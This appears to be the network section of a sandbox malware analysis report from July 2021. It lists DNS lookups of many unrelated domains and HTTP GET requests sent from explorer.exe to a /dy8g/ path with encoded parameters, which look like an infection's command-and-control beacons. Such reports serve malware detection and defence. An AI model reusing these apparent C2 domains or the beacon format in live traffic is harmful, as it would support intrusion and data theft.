                                                                      Jul 22, 2021 18:05:45.751358986 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:50.830846071 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:50.873204947 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:50.873344898 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:50.873647928 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:50.915102959 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:51.027597904 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:51.027626991 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:51.027852058 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:51.027976990 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:51.054819107 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:51.054953098 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:51.069421053 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:06:01.784503937 CEST4974180192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:02.012566090 CEST8049741154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:02.519721985 CEST4974180192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:02.755395889 CEST8049741154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:03.269886017 CEST4974180192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:03.498265982 CEST8049741154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:07.655210018 CEST4974280192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:07.886217117 CEST8049742154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:08.395172119 CEST4974280192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:08.579940081 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:08.622020006 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:08.622199059 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:08.622399092 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:08.627537012 CEST8049742154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:08.664433956 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:08.765433073 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:08.765459061 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:08.769030094 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:08.769263983 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:09.082741976 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:09.124838114 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:09.129683971 CEST4974280192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:09.360474110 CEST8049742154.88.31.204192.168.2.5

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jul 22, 2021 18:04:09.703279972 CEST6173353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:09.756174088 CEST53617338.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:10.560837984 CEST6544753192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:10.613598108 CEST53654478.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:11.544034004 CEST5244153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:11.593672037 CEST53524418.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:12.843043089 CEST6217653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:12.892234087 CEST53621768.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:13.708331108 CEST5959653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:13.757579088 CEST53595968.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:14.976648092 CEST6529653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:15.026065111 CEST53652968.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:15.870773077 CEST6318353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:15.922878027 CEST53631838.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:17.254570961 CEST6015153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:17.313491106 CEST53601518.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:18.460608006 CEST5696953192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:18.517884016 CEST53569698.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:29.469683886 CEST5516153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:29.536891937 CEST53551618.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:38.770940065 CEST5475753192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:38.833014965 CEST53547578.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:02.792947054 CEST4999253192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:02.842144966 CEST53499928.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:03.003333092 CEST6007553192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:03.063633919 CEST53600758.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:03.668939114 CEST5501653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:03.729618073 CEST53550168.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:05.237622023 CEST6434553192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:05.305864096 CEST53643458.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:16.708476067 CEST5712853192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:16.844685078 CEST53571288.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:24.348808050 CEST5479153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:24.412262917 CEST53547918.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:29.725193024 CEST5046353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:29.798022032 CEST53504638.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:34.991868019 CEST5039453192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:35.301244020 CEST53503948.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:40.347507000 CEST5853053192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:40.408329010 CEST53585308.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:43.520809889 CEST5381353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:43.588076115 CEST53538138.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:44.008579969 CEST6373253192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:44.068742037 CEST53637328.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:45.601917028 CEST5734453192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:45.660773993 CEST53573448.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:50.758366108 CEST5445053192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:50.829539061 CEST53544508.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:56.063550949 CEST5926153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:56.557075024 CEST53592618.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:01.572627068 CEST5715153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:01.782565117 CEST53571518.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:07.533250093 CEST5941353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:07.590384960 CEST53594138.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:08.508938074 CEST6051653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:08.576487064 CEST53605168.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:18.814857960 CEST5164953192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:18.888294935 CEST53516498.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:23.903868914 CEST6508653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:23.966645956 CEST53650868.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:06:29.368000984 CEST5643253192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:06:29.558474064 CEST53564328.8.8.8192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jul 22, 2021 18:05:24.348808050 CEST192.168.2.58.8.8.80xc49eStandard query (0)www.cochez.clubA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:29.725193024 CEST192.168.2.58.8.8.80x4939Standard query (0)www.cindywillardrealtor.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:34.991868019 CEST192.168.2.58.8.8.80x7e9dStandard query (0)www.boatrace-life04.netA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:40.347507000 CEST192.168.2.58.8.8.80xbdd4Standard query (0)www.wideawakemomma.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:45.601917028 CEST192.168.2.58.8.8.80x1e19Standard query (0)www.vermogenswerte.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:50.758366108 CEST192.168.2.58.8.8.80x7c2bStandard query (0)www.thenorthgoldline.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:56.063550949 CEST192.168.2.58.8.8.80x8ab6Standard query (0)www.saludflv.infoA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:01.572627068 CEST192.168.2.58.8.8.80x76bcStandard query (0)www.aizaibali.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:07.533250093 CEST192.168.2.58.8.8.80x58f6Standard query (0)www.aizaibali.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:08.508938074 CEST192.168.2.58.8.8.80xa77eStandard query (0)www.extinctionbrews.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:18.814857960 CEST192.168.2.58.8.8.80x9265Standard query (0)www.livegaming.storeA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:23.903868914 CEST192.168.2.58.8.8.80xb162Standard query (0)www.melodezu.comA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:29.368000984 CEST192.168.2.58.8.8.80xdcf1Standard query (0)www.garimpeirastore.onlineA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jul 22, 2021 18:05:24.412262917 CEST8.8.8.8192.168.2.50xc49eNo error (0)www.cochez.clubcochez.clubCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:24.412262917 CEST8.8.8.8192.168.2.50xc49eNo error (0)cochez.club95.215.210.10A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:29.798022032 CEST8.8.8.8192.168.2.50x4939No error (0)www.cindywillardrealtor.comcindywillardrealtor.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:29.798022032 CEST8.8.8.8192.168.2.50x4939No error (0)cindywillardrealtor.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:35.301244020 CEST8.8.8.8192.168.2.50x7e9dName error (3)www.boatrace-life04.netnonenoneA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:40.408329010 CEST8.8.8.8192.168.2.50xbdd4No error (0)www.wideawakemomma.comwideawakemomma.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:40.408329010 CEST8.8.8.8192.168.2.50xbdd4No error (0)wideawakemomma.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:45.660773993 CEST8.8.8.8192.168.2.50x1e19No error (0)www.vermogenswerte.comvermogenswerte.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:45.660773993 CEST8.8.8.8192.168.2.50x1e19No error (0)vermogenswerte.com172.104.157.41A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:50.829539061 CEST8.8.8.8192.168.2.50x7c2bNo error (0)www.thenorthgoldline.com825610.parkingcrew.netCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:05:50.829539061 CEST8.8.8.8192.168.2.50x7c2bNo error (0)825610.parkingcrew.net75.2.81.221A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:05:56.557075024 CEST8.8.8.8192.168.2.50x8ab6Server failure (2)www.saludflv.infononenoneA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:01.782565117 CEST8.8.8.8192.168.2.50x76bcNo error (0)www.aizaibali.com154.88.31.204A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:07.590384960 CEST8.8.8.8192.168.2.50x58f6No error (0)www.aizaibali.com154.88.31.204A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:08.576487064 CEST8.8.8.8192.168.2.50xa77eNo error (0)www.extinctionbrews.comextinctionbrews.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:06:08.576487064 CEST8.8.8.8192.168.2.50xa77eNo error (0)extinctionbrews.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:18.888294935 CEST8.8.8.8192.168.2.50x9265Name error (3)www.livegaming.storenonenoneA (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:23.966645956 CEST8.8.8.8192.168.2.50xb162No error (0)www.melodezu.commelodezu.comCNAME (Canonical name)IN (0x0001)
                                                                      Jul 22, 2021 18:06:23.966645956 CEST8.8.8.8192.168.2.50xb162No error (0)melodezu.com64.227.87.162A (IP address)IN (0x0001)
                                                                      Jul 22, 2021 18:06:29.558474064 CEST8.8.8.8192.168.2.50xdcf1No error (0)www.garimpeirastore.online209.99.40.222A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.cochez.club
                                                                      • www.cindywillardrealtor.com
                                                                      • www.wideawakemomma.com
                                                                      • www.vermogenswerte.com
                                                                      • www.thenorthgoldline.com
                                                                      • www.extinctionbrews.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.54973495.215.210.1080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:24.568625927 CEST9835OUTGET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.cochez.club
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:24.706911087 CEST9836INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 22 Jul 2021 16:05:24 GMT
                                                                      Server: Apache/2.4.6 (CentOS) PHP/7.3.19
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.54973534.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:29.842456102 CEST9837OUTGET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.cindywillardrealtor.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:29.980777979 CEST9837INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:05:29 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60f790d8-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.54973634.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:40.453010082 CEST9838OUTGET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.wideawakemomma.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:40.590605021 CEST9839INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:05:40 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60ef679d-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.549739172.104.157.4180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:45.704566002 CEST9855OUTGET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.vermogenswerte.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:45.750137091 CEST9857INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      date: Thu, 22 Jul 2021 16:05:45 GMT
                                                                      server: LiteSpeed
                                                                      vary: User-Agent
                                                                      Data Raw: 32 37 38 61 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20
                                                                      Data Ascii: 278a<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                                                      Jul 22, 2021 18:05:45.750384092 CEST9858INData Raw: 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                      Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF;
                                                                      Jul 22, 2021 18:05:45.750477076 CEST9859INData Raw: 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copy
